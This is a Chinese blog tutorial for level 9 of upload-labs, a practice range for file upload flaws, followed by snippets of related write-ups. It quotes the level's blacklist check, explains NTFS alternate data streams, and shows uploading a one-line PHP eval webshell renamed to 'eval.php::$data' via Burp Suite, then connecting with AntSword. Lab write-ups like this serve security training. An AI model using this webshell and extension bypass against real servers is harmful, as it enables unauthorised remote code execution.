upload-labs第九关教程

已于 2024-06-11 11:37:10 修改
阅读量460 收藏
点赞数 15
文章标签: 网络安全
于 2024-06-11 11:36:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73528952/article/details/139594384
版权

upload-labs第九关教程

一、源代码分析

代码审计

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = trim($file_ext); //首尾去空
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件类型不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

相对于上面的关卡来说,它少了对::$DATA的过滤,所以是不是可以考虑通过::$DATA进行绕过

::$DATA介绍

备用数据流(Alternate Data Streams,ADS)是Windows中的一个特性,它允许在一个文件中隐藏额外的信息。这个特性是NTFS(Windows常用的一种文件系统)独有的。
可以这样想:可以把备用数据流想象成一本书中的“隐形笔记”。这本书(文件)看起来还是那本书,里面的主要内容没有变,但你可以在书页的空白处(备用数据流)用隐形墨水写一些额外的内容(数据流),只有知道方法的人才能看到这些内容。

二、绕过分析

特殊字符::$data绕过

上传eval.php

<?php @eval($_POST['cmd']); ?>

使用burpsuite抓包进行修改

修改之前:
在这里插入图片描述filename为eval.php

修改之后:
在这里插入图片描述filename为eval.php::$data。

放包,查看是否上传成功

在这里插入图片描述上传成功,但是如果使用中国蚁剑进行连接的话就得把后面的那一串::$data删除就行了。

使用中国蚁剑进行连接

在这里插入图片描述连接成功。

如果有问题的话,可以私信问我。

Estera.
关注
  • 15
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
upload-labs靶场第一——第九
AmeV_ll的博客
02-23 451
Upload-Labs是一个使用PHP语言编写、专注于文件上传漏洞的闯网络安全靶场。练习该靶场可以有效地了解并掌握文件上传漏洞的原理、利用方法和修复方案。
upload-labs第一、二
PISES3_5的博客
08-24 212
upload-labs第一、二
于文件上传漏洞的观点(upload-labs第九
hanjunhao2002的博客
02-24 234
我们可以利用这样的检验机制,首先我们在文件后缀名后添加一个点,希望最终以此来绕过黑名单检测,但是因为存在去除文件名末尾的点的代码,所以我们需要不止一个点,注意我们用来绕过黑名单的点显然不能够被消除,所以要在他后面放一个东西防止他落在最后一位。我们看到收尾去空的代码在去点代码之后,所以用空格来充当占位符号。以上面为例,我们可以看到于文件是如何识别的,本通过查看源码发现,不仅黑名单奇长无比,且限制了’.htaccess’文件类型。这时我们理解代码的含义,发现首先会去处文件名末尾的点,然后首尾去空。
upload-labs靶场通指南(9-11
永远是少年
09-10 904
今天继续给大家介绍渗透测试相知识,本文主要内容是upload-labs靶场通指南(9-11) 一、第九 二、第十 三、第十一
Upload LABS Pass-9
热门推荐
wangyuxiang946的博客
07-03 1万+
uploadlabs9,upload labs 第九在后端使用了黑名单,并过滤了大小写,空格,点以及数据流 , 但未对文件重命名并且只过滤了一遍点和空格 , 我们在文件后缀名添加 点空格点 , 来绕过黑名单
文件上传--Upload-labs--Pass09(在某些版本里是Pass10)--点+空格+点 绕过
2302_79800344的博客
02-19 736
点+空格+点绕过详解 与 使用局限性
upload-labs(1-7)
weixin_43825758的博客
04-14 479
upload-labs源码地址:https://github.com/c0ny1/upload-labs 第一 前端js验证 如果上传php文件,不允许 f12,查看js代码,删掉 或者burp 把png文件改php文件 打开文件,用菜刀或蚁剑连(其实也可以phpinfo的,不需连,打开文件看效果) 第二 MIME验证 用burp与第一类似,仅判断content-type中的类型,故将content-type改为图片类型image/jpeg、image/png、image/gif 第三
upload-labs19-20以及总结1
08-08
在本卡中,我们面对的是一个Web应用程序的文件上传功能。从题目描述和源码分析,我们可以看到存在几个键的防御措施,但同时也存在明显的漏洞。首先,我们需要理解文件上传的基本流程及其潜在的安全风险。...
upload-labs 第四-第九方法
qq_62673514的博客
02-23 1088
upload-labs 第四-第九方法
Upload-labs通攻略(适合新手)
夜思红尘的博客
04-12 2218
这是一篇upload-labs通攻略,适合新手
Upload-Labs-Pass-09
龙狼刺的博客
04-23 218
目录 一、相知识 1、路径拼接绕过原理 二、环境搭配 三、文件上传 1、创建webshell 2、修改文件名 3、文件上传 四、Weevely连接 一、相知识 1、路径拼接绕过原理 在没有对上传文件进行重命名的情况下,用户可以自定义文件名并在服务器中上传新建,就会造成对应的绕过黑名单。 二、环境搭配 攻击机: kali IP: 192.168.0.112 靶机: Windows2008 IP: 192.168.0.130...
upload-labs靶场-Pass-09-思路以及过程
weixin_44257023的博客
01-16 1049
开始前的小准备 upload-labs靶场 是PHP环境运行的,所以我准备了一个PHP脚本和一张图片 图片好准备,PHP脚本如果不想写的话可以用我的这个获取当前时间的PHP脚本 <?php header("content-type:text/html;charset=utf-8"); date_default_timezone_set("PRC");//设置时区 echo "当前时间为:"; $today = date("Y-m-d D h:i:s A "); echo $today; ?
upload-labs卡9(基于win特性data流绕过)通思路
zyh1588的博客
11-17 435
小白回顾文件上传靶场第九
upload-labs 09(配合解析漏洞)
LuckySec
11-07 731
题目 查看源码 该代码对文件名最后是进行拼接的,可以伪造文件名 通过bp截断上传文件,在文件后添加&quot;. .&quot;进行伪造,如图示 验证文件 文件上传成功! 小提示:在前面的某些卡也存在同样的漏洞,可用此方法通过。 ...
upload-labs 第四-第九 操作步骤配截图
weixin_56513549的博客
02-13 837
4.先上传一个.htaccess文件,再上传文件 5.抓包后面加.. 6.抓包后缀用PHP 7.抓包在php后面加个空格 8.抓包php后缀加. 9.抓包后缀加上::$DATA
upload-labs通
hello word的博客
06-24 5688
第一–上传webshell 要求:要上传一个webs hell到服务器上。 显示源码 function checkFile() { var file = document.getElementsByName('upload_file')[0].value; if (file == null || file == "") { alert("请选择要上传的文件!");...
upload-labs打详解
bamanju0574的博客
09-12 1168
1-19 00x01 JS检查 方法一.修改javascript代码,将.php添加到允许上传的类型中 3.上传成功 方法二:绕过前端,通过burpsuit抓包,上传一张info.jpg图片,然后抓包之后,将后缀改为.php,发包上传成功 00x02 服务端对数据包的MIME进行检查 1. burpsuite类型type绕过,上传.ph...
upload-labs通(第8-第11
最新发布
qq_73985955的博客
07-27 398
查看代码,我们会发现代码虽然少了一些,但是按照之前的方法还是不能绕过黑名单上传文件,主要是因为下面这行代码把黑名单中的文件后缀名都用空格替换掉了,但只替换了一次,那我们不就可以用双写后缀名绕过了。我们观察这的代码,发现这次代码什么都没缺,很像之前的一,发现就是一样的,又是只对空格和点只过滤一次,那我们又能用点加空格加点绕过了(好吧,我也不记得我用了多少这个方法绕过了)这里代码会先把pphphp里面的php过滤掉并用空格替代,然后就剩下了p hp,因为系统特性,又会把空格去掉,所以就剩下php了。
upload-labs第十九
08-23
upload-labs的第十九是通过上传图片马来实现攻击。在这个卡中,与第17相比,增加了对后缀名的检测,禁止直接上传php文件。所以你需要上传一个图片马并使用文件包含来访问它。具体的步骤与第17类似,你可以上传一个名为22.gif的文件,然后进行抓包并进行攻击。这样就可以成功通第十九。 <span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [upload-labs详解1-19全解(最全最详细一看就会)](https://blog.csdn.net/qq_53003652/article/details/129969951)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值